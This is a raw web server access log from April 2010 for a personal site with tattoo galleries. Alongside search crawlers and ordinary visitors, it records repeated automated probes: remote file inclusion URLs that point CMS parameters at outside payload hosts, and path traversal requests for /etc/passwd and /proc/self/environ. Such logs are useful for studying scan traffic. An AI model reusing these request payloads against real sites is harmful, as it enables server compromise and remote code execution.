62.140.247.10 - - [30/Apr/2010:19:01:58 -0500] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.2kiev.com.ua/images/id.png? HTTP/1.1" 404 294 "-""Mozilla/5.0"
62.140.247.10 - - [30/Apr/2010:19:01:58 -0500] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.2kiev.com.ua/images/id.png? HTTP/1.1" 404 299 "-""Mozilla/5.0"
87.250.255.243 - - [30/Apr/2010:19:07:45 -0500] "GET /logs/access_log.1229385600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
208.115.111.248 - - [30/Apr/2010:19:08:47 -0500] "GET /logs/access_log.1210377600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [30/Apr/2010:19:08:49 -0500] "GET /logs/access_log.1223337600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [30/Apr/2010:19:08:52 -0500] "GET /logs/access_log.1227571200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [30/Apr/2010:19:08:54 -0500] "GET /logs/access_log.1233792000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [30/Apr/2010:19:08:56 -0500] "GET /logs/access_log.1245888000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
207.46.199.37 - - [30/Apr/2010:19:10:25 -0500] "GET /logs/access_log.1240272000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [30/Apr/2010:19:15:50 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [30/Apr/2010:19:15:50 -0500] "GET /logs/access_log.1222041600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
69.175.26.98 - - [30/Apr/2010:19:18:20 -0500] "GET /logs/errors.php?error=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
69.175.26.98 - - [30/Apr/2010:19:18:20 -0500] "GET /logs/access_log.1268611200%20%20/errors.php?error=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
69.175.26.98 - - [30/Apr/2010:19:18:20 -0500] "GET /errors.php?error=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
209.59.164.98 - - [30/Apr/2010:19:19:41 -0500] "GET /errors.php?error=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
209.59.164.98 - - [30/Apr/2010:19:19:41 -0500] "GET /logs/errors.php?error=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
209.59.164.98 - - [30/Apr/2010:19:19:41 -0500] "GET /logs/access_log.1268611200%20%20/errors.php?error=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
209.59.164.98 - - [30/Apr/2010:19:19:46 -0500] "GET /errors.php?error=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
209.59.164.98 - - [30/Apr/2010:19:19:46 -0500] "GET /logs/errors.php?error=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
209.59.164.98 - - [30/Apr/2010:19:19:46 -0500] "GET /logs/access_log.1268611200%20%20/errors.php?error=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
217.23.8.91 - - [30/Apr/2010:19:19:57 -0500] "GET /logs/errors.php?error=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
217.23.8.91 - - [30/Apr/2010:19:19:57 -0500] "GET /logs/access_log.1268611200%20%20/errors.php?error=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
217.23.8.91 - - [30/Apr/2010:19:19:57 -0500] "GET /errors.php?error=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
87.250.255.243 - - [30/Apr/2010:19:21:09 -0500] "GET /logs/access_log.1269302400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.199.41 - - [30/Apr/2010:19:22:25 -0500] "GET /logs/access_log.1222560000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.98 - - [30/Apr/2010:19:23:25 -0500] "GET /logs/access_log.1157932800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
74.50.85.15 - - [30/Apr/2010:19:23:32 -0500] "GET /errors.php?error=http://www.howtolisten.kr//parti/data/admin/id1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
74.50.85.15 - - [30/Apr/2010:19:23:32 -0500] "GET /logs/access_log.1268611200%20%20/errors.php?error=http://www.howtolisten.kr//parti/data/admin/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
74.50.85.15 - - [30/Apr/2010:19:23:32 -0500] "GET /logs/errors.php?error=http://www.howtolisten.kr//parti/data/admin/id1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
69.175.26.98 - - [30/Apr/2010:19:28:45 -0500] "GET /logs/access_log.1268611200/errors.php?error=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
66.249.71.36 - - [30/Apr/2010:19:30:51 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.36 - - [30/Apr/2010:19:30:51 -0500] "GET /logs/access_log.1263859200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.50.85.15 - - [30/Apr/2010:19:32:30 -0500] "GET /?g4[path]=http://www.howtolisten.kr//parti/data/admin/id1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
74.50.85.15 - - [30/Apr/2010:19:32:30 -0500] "GET /logs/?g4[path]=http://www.howtolisten.kr//parti/data/admin/id1.txt?? HTTP/1.1" 200 3853 "-""Mozilla/5.0"
74.50.85.15 - - [30/Apr/2010:19:32:30 -0500] "GET /logs/access_log.1270684800%20%20/?g4[path]=http://www.howtolisten.kr//parti/data/admin/id1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
209.59.164.98 - - [30/Apr/2010:19:33:06 -0500] "GET /logs/access_log.1268611200/errors.php?error=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
74.50.85.15 - - [30/Apr/2010:19:33:12 -0500] "GET /?g4[path]=http://www.howtolisten.kr//parti/data/admin/id1.txt? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
74.50.85.15 - - [30/Apr/2010:19:33:12 -0500] "GET /logs/?g4[path]=http://www.howtolisten.kr//parti/data/admin/id1.txt? HTTP/1.1" 200 3853 "-""Mozilla/5.0"
74.50.85.15 - - [30/Apr/2010:19:33:12 -0500] "GET /logs/access_log.1270684800%20%20/?g4[path]=http://www.howtolisten.kr//parti/data/admin/id1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
87.250.255.243 - - [30/Apr/2010:19:33:13 -0500] "GET /logs/access_log.1216339200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.204.242 - - [30/Apr/2010:19:37:55 -0500] "GET /logs/access_log.1232582400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.195.226 - - [30/Apr/2010:19:38:55 -0500] "GET /logs/access_log.1164153600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
121.190.102.21 - - [30/Apr/2010:19:41:20 -0500] "GET /logs/access_log.1268956800%20%20/xGB.php?act=admin&do=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
121.190.102.21 - - [30/Apr/2010:19:41:20 -0500] "GET /xGB.php?act=admin&do=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 291 "-""Mozilla/5.0"
121.190.102.21 - - [30/Apr/2010:19:41:20 -0500] "GET /logs/xGB.php?act=admin&do=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 296 "-""Mozilla/5.0"
121.190.102.21 - - [30/Apr/2010:19:41:37 -0500] "GET /logs/access_log.1270598400%20%20/xGB.php?act=admin&do=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
207.46.204.236 - - [30/Apr/2010:19:45:25 -0500] "GET /logs/access_log.1170374400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
121.190.102.21 - - [30/Apr/2010:19:47:16 -0500] "GET /xGB.php?act=admin&do=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 291 "-""Mozilla/5.0"
121.190.102.21 - - [30/Apr/2010:19:47:16 -0500] "GET /logs/access_log.1268956800/xGB.php?act=admin&do=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
121.190.102.21 - - [30/Apr/2010:19:47:16 -0500] "GET /logs/xGB.php?act=admin&do=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 296 "-""Mozilla/5.0"
87.250.255.243 - - [30/Apr/2010:19:48:06 -0500] "GET /artwork/carousel.htm HTTP/1.1" 200 814 "-""Yandex/1.01.001 (compatible; Win16; I)"
121.190.102.21 - - [30/Apr/2010:19:48:47 -0500] "GET /logs/access_log.1268956800%20%20/xGB.php?act=admin&do=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
121.190.102.21 - - [30/Apr/2010:19:48:51 -0500] "GET /logs/access_log.1270598400%20%20/xGB.php?act=admin&do=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
78.110.50.139 - - [30/Apr/2010:19:51:27 -0500] "GET //components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://www.vsl-gates.ru//assets/images/id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
78.110.50.139 - - [30/Apr/2010:19:51:27 -0500] "GET /logs/access_log.1263772800//components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://www.vsl-gates.ru//assets/images/id1.txt?? HTTP/1.1" 404 359 "-""Mozilla/5.0"
78.110.50.139 - - [30/Apr/2010:19:51:27 -0500] "GET /logs//components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://www.vsl-gates.ru//assets/images/id1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
78.110.50.139 - - [30/Apr/2010:19:51:37 -0500] "GET //components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://www.vsl-gates.ru//assets/images/id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
78.110.50.139 - - [30/Apr/2010:19:51:37 -0500] "GET /logs//components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://www.vsl-gates.ru//assets/images/id1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
78.110.50.139 - - [30/Apr/2010:19:51:37 -0500] "GET /logs/access_log.1263772800//components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://www.vsl-gates.ru//assets/images/id1.txt?? HTTP/1.1" 404 359 "-""Mozilla/5.0"
78.110.50.139 - - [30/Apr/2010:19:51:47 -0500] "GET //components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=http://www.vsl-gates.ru//assets/images/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
78.110.50.139 - - [30/Apr/2010:19:51:47 -0500] "GET /logs/access_log.1264723200//components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=http://www.vsl-gates.ru//assets/images/id1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
78.110.50.139 - - [30/Apr/2010:19:51:47 -0500] "GET /logs//components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=http://www.vsl-gates.ru//assets/images/id1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
78.110.50.139 - - [30/Apr/2010:19:51:47 -0500] "GET //components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=http://www.vsl-gates.ru//assets/images/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
78.110.50.139 - - [30/Apr/2010:19:51:47 -0500] "GET /logs/access_log.1264723200//components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=http://www.vsl-gates.ru//assets/images/id1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
78.110.50.139 - - [30/Apr/2010:19:51:47 -0500] "GET /logs//components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=http://www.vsl-gates.ru//assets/images/id1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
78.110.50.139 - - [30/Apr/2010:19:51:52 -0500] "GET /logs/access_log.1263772800//components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=http://www.vsl-gates.ru//assets/images/id1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
78.110.50.139 - - [30/Apr/2010:19:51:52 -0500] "GET /logs/access_log.1263772800//components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=http://www.vsl-gates.ru//assets/images/id1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
218.38.34.19 - - [30/Apr/2010:19:53:22 -0500] "GET /logs//setup.php?dir=http://www.villantomagazin.com//1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
218.38.34.19 - - [30/Apr/2010:19:53:22 -0500] "GET //setup.php?dir=http://www.villantomagazin.com//1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
218.38.34.19 - - [30/Apr/2010:19:53:22 -0500] "GET /logs/access_log.1263340800//setup.php?dir=http://www.villantomagazin.com//1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
77.92.94.85 - - [30/Apr/2010:19:54:22 -0500] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://77.92.94.85/id.jpg?? HTTP/1.1" 404 341 "-""libwww-perl/5.813"
77.92.94.85 - - [30/Apr/2010:19:54:22 -0500] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://77.92.94.85/id.jpg?? HTTP/1.1" 404 336 "-""libwww-perl/5.813"
77.92.94.85 - - [30/Apr/2010:19:54:52 -0500] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://77.92.94.85/id.jpg?? HTTP/1.1" 404 336 "-""libwww-perl/5.813"
77.92.94.85 - - [30/Apr/2010:19:55:53 -0500] "GET /logs/access_log.1231718400//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://77.92.94.85/id.jpg?? HTTP/1.1" 404 363 "-""libwww-perl/5.813"
77.92.94.85 - - [30/Apr/2010:19:55:53 -0500] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://77.92.94.85/id.jpg?? HTTP/1.1" 404 336 "-""libwww-perl/5.813"
77.92.94.85 - - [30/Apr/2010:19:55:54 -0500] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://77.92.94.85/id.jpg?? HTTP/1.1" 404 341 "-""libwww-perl/5.813"
87.250.255.243 - - [30/Apr/2010:19:58:21 -0500] "GET /logs/access_log.1269561600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.1.44.193 - - [30/Apr/2010:19:59:30 -0500] "GET /logs/access_log.1268611200//include/monitoring/engine/errors.php?error=http://77.92.94.85/id.jpg?? HTTP/1.1" 404 348 "-""libwww-perl/5.813"
87.1.44.193 - - [30/Apr/2010:19:59:31 -0500] "GET //include/monitoring/engine/errors.php?error=http://77.92.94.85/id.jpg?? HTTP/1.1" 404 321 "-""libwww-perl/5.813"
87.1.44.193 - - [30/Apr/2010:19:59:31 -0500] "GET /logs//include/monitoring/engine/errors.php?error=http://77.92.94.85/id.jpg?? HTTP/1.1" 404 326 "-""libwww-perl/5.813"
88.104.146.184 - - [30/Apr/2010:20:00:24 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://www.google.co.uk/search?q=vintage+tattoo&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-GB:official&client=firefox-a""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
88.104.146.184 - - [30/Apr/2010:20:00:24 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
88.104.146.184 - - [30/Apr/2010:20:00:27 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
88.104.146.184 - - [30/Apr/2010:20:00:30 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
88.104.146.184 - - [30/Apr/2010:20:00:32 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
88.104.146.184 - - [30/Apr/2010:20:00:33 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
88.104.146.184 - - [30/Apr/2010:20:00:33 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
88.104.146.184 - - [30/Apr/2010:20:00:33 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
88.104.146.184 - - [30/Apr/2010:20:00:33 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
88.104.146.184 - - [30/Apr/2010:20:00:33 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
88.104.146.184 - - [30/Apr/2010:20:00:33 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
88.104.146.184 - - [30/Apr/2010:20:00:33 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
88.104.146.184 - - [30/Apr/2010:20:00:33 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
88.104.146.184 - - [30/Apr/2010:20:00:33 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
88.104.146.184 - - [30/Apr/2010:20:00:34 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
187.45.193.159 - - [30/Apr/2010:20:04:45 -0500] "GET /logs/access_log.1268956800//Neos_Chronos/header.php?base_folder=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 335 "-""libwww-perl/5.805"
187.45.193.159 - - [30/Apr/2010:20:04:46 -0500] "GET //Neos_Chronos/header.php?base_folder=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 308 "-""libwww-perl/5.805"
187.45.193.159 - - [30/Apr/2010:20:04:46 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-""libwww-perl/5.805"
187.45.193.159 - - [30/Apr/2010:20:04:51 -0500] "GET /logs/access_log.1268956800//Neos_Chronos/header.php?base_folder=http://www.kenyahub.com/components/com_jea/sef_ext/idx? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
187.45.193.159 - - [30/Apr/2010:20:04:51 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.kenyahub.com/components/com_jea/sef_ext/idx? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
187.45.193.159 - - [30/Apr/2010:20:04:51 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.kenyahub.com/components/com_jea/sef_ext/idx? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
87.1.44.193 - - [30/Apr/2010:20:06:47 -0500] "GET /logs/access_log.1270684800//include/monitoring/engine/errors.php?error=http://77.92.94.85/id.jpg?? HTTP/1.1" 404 348 "-""libwww-perl/5.813"
87.250.255.243 - - [30/Apr/2010:20:10:22 -0500] "GET /logs/access_log.1249171200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
211.19.31.123 - - [30/Apr/2010:20:10:44 -0500] "GET /logs/access_log.1270684800%20%20//?sIncPath=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
211.19.31.123 - - [30/Apr/2010:20:10:44 -0500] "GET /logs//?sIncPath=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 3858 "-""Mozilla/5.0"
211.19.31.123 - - [30/Apr/2010:20:10:44 -0500] "GET //?sIncPath=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
211.174.62.150 - - [30/Apr/2010:20:11:52 -0500] "GET /logs//?sIncPath=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 3858 "-""Mozilla/5.0"
211.174.62.150 - - [30/Apr/2010:20:11:52 -0500] "GET //?sIncPath=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
211.174.62.150 - - [30/Apr/2010:20:11:52 -0500] "GET /logs/access_log.1219708800%20%20//?sIncPath=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
207.46.199.178 - - [30/Apr/2010:20:12:24 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
211.174.62.150 - - [30/Apr/2010:20:13:05 -0500] "GET /logs/access_log.1270684800%20%20//?sIncPath=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
76.12.192.78 - - [30/Apr/2010:20:22:47 -0500] "GET /logs//index.php?option=com_pcchess&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.812"
76.12.192.78 - - [30/Apr/2010:20:22:47 -0500] "GET //index.php?option=com_pcchess&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.812"
62.24.129.13 - - [30/Apr/2010:20:23:00 -0500] "GET /tattoo/set1.htm HTTP/1.0" 200 2362 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
87.250.255.243 - - [30/Apr/2010:20:28:17 -0500] "GET /logs/access_log.1210550400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
72.44.51.33 - - [30/Apr/2010:20:32:45 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )"
72.44.51.33 - - [30/Apr/2010:20:32:45 -0500] "GET /logs/access_log.1262649600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )"
207.46.13.52 - - [30/Apr/2010:20:34:25 -0500] "GET /logs/access_log.1156464000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.101 - - [30/Apr/2010:20:35:55 -0500] "GET /logs/access_log.1175299200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
111.89.128.186 - - [30/Apr/2010:20:36:51 -0500] "GET /logs//include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=http://77.92.94.85/id.jpg?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
111.89.128.186 - - [30/Apr/2010:20:36:51 -0500] "GET //include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=http://77.92.94.85/id.jpg?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
218.38.34.19 - - [30/Apr/2010:20:37:17 -0500] "GET /setup.php?dir=http://www.villantomagazin.com//1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
218.38.34.19 - - [30/Apr/2010:20:37:53 -0500] "GET /logs/setup.php?dir=http://www.villantomagazin.com//1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
218.38.34.19 - - [30/Apr/2010:20:37:53 -0500] "GET /logs/access_log.1263340800/setup.php?dir=http://www.villantomagazin.com//1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
87.1.44.193 - - [30/Apr/2010:20:38:33 -0500] "GET /logs//include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=http://77.92.94.85/id.jpg?? HTTP/1.1" 404 314 "-""libwww-perl/5.813"
87.1.44.193 - - [30/Apr/2010:20:38:34 -0500] "GET //include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=http://77.92.94.85/id.jpg?? HTTP/1.1" 404 309 "-""libwww-perl/5.813"
87.250.255.243 - - [30/Apr/2010:20:41:44 -0500] "GET /tattoo/tatsymbl.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
195.9.14.148 - - [30/Apr/2010:20:53:05 -0500] "GET /logs/access_log.1251504000/index.php?menu=deti&page=http://gayrealestate.com/listing_manager/images/uploads/agent_photo/medium/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
195.9.14.148 - - [30/Apr/2010:20:53:05 -0500] "GET /index.php?menu=deti&page=http://gayrealestate.com/listing_manager/images/uploads/agent_photo/medium/id1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
195.9.14.148 - - [30/Apr/2010:20:53:05 -0500] "GET /logs/index.php?menu=deti&page=http://gayrealestate.com/listing_manager/images/uploads/agent_photo/medium/id1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
195.9.14.148 - - [30/Apr/2010:20:53:05 -0500] "GET /index.php?menu=deti&page=http://gayrealestate.com/listing_manager/images/uploads/agent_photo/medium/id1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
195.9.14.148 - - [30/Apr/2010:20:53:05 -0500] "GET /logs/access_log.1264118400/index.php?menu=deti&page=http://gayrealestate.com/listing_manager/images/uploads/agent_photo/medium/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
